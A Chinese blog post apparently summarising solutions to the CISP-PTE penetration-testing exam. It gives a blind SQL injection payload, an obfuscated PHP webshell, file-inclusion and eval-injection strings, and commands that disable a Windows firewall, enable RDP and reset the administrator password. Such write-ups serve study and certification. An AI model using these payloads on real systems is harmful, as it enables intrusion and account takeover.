2021-12月CISP-PTE考试总结
12月末参加了PTE考试,题不算难,但考试操作环境垃圾的一瞥,sqlmap不能跑,20道选择,5道基础题,1道综合题,如果不卡壳花4个小时做完也是很有压力。选择题就不说了,主要记录一下大题解法,当然方法不止一种。
一、SQL注入
sqlmap长时间没更新,跑不起来,只能手注,使用二分法,利用burpsuite慢慢跑,阿西吧。
title=222%27/**/and/**/(if((ascii(substr((select/**/group_concat(password)/**/from/**/users1/**/where/**/username='admin'),1,1))=107),sleep(5),0))/**/and/**/%27abc%27=%27abc&content=/**/
二、文件上传
搞一个php免杀马直接上传即可。
<?php $b = substr_replace("assexx","rt",4);$a = array($arrayName = array('a' => $b($_POST['pte'])))?>
三、文件包含
php:/php:///filter/read=convert.base64-encode/resource=../key3.php
四、代码审计
<?php
error_repoerting(0);
include "key4.php";
$a=$_GET['a'];
eval("\$o=strtolower(\"$a\");");
echo $o;
show_source(__FILE__);
a参数直接传入${@eval($_POST[1])}
,POST 1=cat%20key4.php
。
五、失效的访问控制。
修改Isadmin=false&username=R3Vlc3Q%3D
为Isadmin=true&username=YWRtaW4%3D
即可。
六、综合题
综合题是一个图片管理系统,目录扫描发现PhpMyAdmin和后台,PhpMyAdmin弱口令root/root登录,获取key6。发现在数据库images 的 system表中有admin的密码hash,修改为123456的md5hash登录即可。登录后台后传入木马,菜刀连接,翻一翻网站目录发现key7。最后一个key8提示在桌面,那就是要远程连接查看。首先关闭防火墙netsh advfirewall set allprofiles state off
,之后利用他的工具库里边的3389端口开启脚本,上传到网站目录下并执行,开启3389端口(上传失败就鼠标拖动到菜刀的网站目录下)。修改administrator的密码net user administrator 123456
,mstsc 远程连接,在回收站找到key8。
本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 (CC BY-NC-ND 4.0) 进行许可。